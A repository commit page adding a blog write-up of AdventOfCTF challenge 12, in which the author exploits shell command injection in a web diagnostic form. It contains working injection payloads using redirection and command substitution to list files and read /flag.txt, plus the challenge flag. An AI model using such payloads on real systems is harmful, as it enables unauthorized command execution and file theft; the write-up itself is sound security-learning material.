maik
/
Personal-Website
mirror of https://github.com/maikka39/Personal-Website.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add challenge 12

Browse Source
pull/4/head
Maik de Kruif 3 years ago
parent 0da0b9897c
commit eb66eaee56
No known key found for this signature in database
GPG Key ID: 46C1200ACD3A432F
2 changed files with 123 additions and 0 deletions
Whitespace
Show all changes Ignore whitespace when comparing lines Ignore changes in amount of whitespace Ignore changes in whitespace at EOL
Split View
Diff Options
Show Stats Download Patch File Download Diff File
  1. 123
      content/posts/adventofctf/challenge_12.md
  2. BIN
      static/img/adventofctf/af3424cd215a6459494ae07eab33cb35.png

123
content/posts/adventofctf/challenge_12.md
Unescape View File

@ -0,0 +1,123 @@
+++
author = "Maik de Kruif"
title = "Challenge 12 - AdventOfCTF"
date = 2020-12-14T15:55:21+01:00
description = "A writeup for challenge 12 of AdventOfCTF."
cover = "img/adventofctf/af3424cd215a6459494ae07eab33cb35.png"
tags = [
"AdventOfCTF",
"challenge",
"ctf",
"hacking",
"writeup",
"web",
"php",
]
categories = [
"ctf",
"writeups",
"hacking",
]
+++
- Points: 1100
## Description
To ensure a good Christmas we implemented some diagnostic tools. This one checks that the time to a destination is within an acceptable range. The flag is in /flag.txt.
Visit <https://12.adventofctf.com> to start the challenge.
## Finding the vulnerability
Upon opening the challenge website we're greeted with an input field and a check button. Let's enter some text in the input and press the check button. Initially, nothing happens but after a few seconds we get a result: `1607956922.306628 Destination check was OK`. As the page didn't reload there is probably some javascript in play. Indeed there is, when opening the source, we find a script tag with the following javascript function:
```js
function send() {
let place = $("#place")[0].value;
if (place.length > 0) {
$.post("/", { place: place }, function (data) {
$("#result")[0].innerHTML = "<b>" + data + "</b>";
});
}
return false;
}
```
If we analyze this function a bit we find that it executes a `POST` request to `/` and puts the result in an HTML element with this selector: `'#result'`.
Let's try some more inputs. Just plain text doesn't seem to change the result much besides the number before "Destination check". If we, however, enter a quote (`"`), we get a different result back:
```text
Something happened: /bin/bash: -c: line 0: unexpected EOF while looking for matching `"'
/bin/bash: -c: line 1: syntax error: unexpected end of file
```
And inputting a backtick (`) returns this error:
```text
Something happened: BusyBox v1.31.1 () multi-call binary.
Usage: nslookup [-type=QUERY_TYPE] [-debug] HOST [DNS_SERVER]
Query DNS about HOST
QUERY_TYPE: soa,ns,a,aaaa,cname,mx,txt,ptr,any
```
### nslookup
I spend quite some time trying to find a way to get out of this command but I could not get anything to work so I took a break.
### Redirection
When I came back, I tried inputting a redirect character (`>`) and it gave a result!
## Getting some output
After entering a redirection character (`>`) we get the following result:
```text
Something happened: /bin/bash: -c: line 0: syntax error near unexpected token `newline'
/bin/bash: -c: line 0: `./check &gt;'
```
This means we can redirect output and thus get arbitrary code execution by putting a sub-command as the output like so:
```bash
> $(ls)
```
But entering this gave an error:
```text
Something happened: /bin/bash: $(ls): ambiguous redirect
```
This means that, while it does work, it does not work directly as the output isn't valid. If we, however, put a sub-command inside a sub-command (`> $($(ls))`), the inner output will be printed:
```text
Something happened: /bin/bash: app.py: command not found
/bin/bash: $($(ls)): ambiguous redirect
```
As we can see, there seems to be an `app.py` file but we don't care about it now. Let's try to cat the flag from the location specified in the challenge description (`/flag.txt`) by entering the following input: `>$($(cat /flag.txt))`. This return the following result:
```text
Something happened: /bin/bash: Congratulations,: command not found
/bin/bash: $($(cat /flag.txt)): ambiguous redirect
```
As we can see, it did read the file. Sadly, however, it only returned the first line...
At this point, I didn't really know what to do but just as I was about to take another break, [@credmp](https://twitter.com/credmp) posted a hint on Twitter. It said the following: "Hint: all error messages are printed on stderr.".
### Redirecting the output
After reading this tweet, I tried the following input: `>$(cat /flag.txt>/dev/stderr)` and it immediately worked! I felt pretty stupid for not having thought about that 😐.
## Solution
So redirecting the output to `stderr` worked and we got the flag: `NOVI{we_are_halfway_to_christmas!}`.
This flag can then be submitted for the [challenge](https://ctfd.adventofctf.com/challenges#12-13).

BIN
static/img/adventofctf/af3424cd215a6459494ae07eab33cb35.png
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 516 KiB

Write Preview
Loading…
Cancel
Save